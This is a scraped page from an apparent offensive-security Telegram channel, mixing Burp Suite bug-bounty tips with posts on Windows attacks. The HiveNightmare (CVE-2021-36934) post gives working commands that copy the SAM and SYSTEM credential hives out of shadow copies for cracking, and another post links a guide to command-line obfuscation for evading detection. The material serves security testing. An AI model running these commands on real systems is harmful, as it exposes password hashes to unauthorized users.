12.5K subscribers
550 photos
27 videos
24 files
889 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.iss.one/APT_Notes/6

Chat Link:
t.iss.one/APT_Notes_PublicChat
Download Telegram
#BurpHacksForBounties - Day 18/30

Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response?

If yes try this 👇🏻 🧵

#appsec #infosec #bugbountytips #bugbountytip #burp
1. Create a filter for intruder response.
2. Start the payload
3. If the response contains the string you entered in "grep" that will show up in an extra column.

-> You can only focus on the response you are looking for.
🔥 HiveNightmare 🔥

Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin.
This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want.

https://github.com/GossiTheDog/HiveNightmare

#redteam #pentest #vuln #nightmare
#BurpHacksForBounties - Tip 19/30

Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code.

Using a plugin developed by @BurpBounty @egarme

#infosec #appsec #burp #bugbountytips
Plugin name: BurpBounty Scan Check Builder.
It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️
APT
🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves…
WINDOWS LPE "HiveNightmare" or "SeriousSAM"

CVE-2021-36934
The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating.

1) Check permissions:
icacls.exe C:\Windows\System32\config\SAM

2) Check shadow copies, restore points
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')
... and so on

3) Copy SAM and SYSTEM files from shadow copy:
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')
#BurpHacksForBounties - Tip 20/30

Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.

https://sansorg.egnyte.com/dd/x19ByeTOpS/
#BurpHacksForBounties - Day 21/30

❤️ Burp Collaborator ❤️ 🙈

Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.

See what, how, and why👇🏻
1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model.
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
2/n
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload

In my case: DNS, HTTP requests were made.
3/n
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
Windows Command-Line Obfuscation

Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.

# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

#cheatsheet #cmd #pentest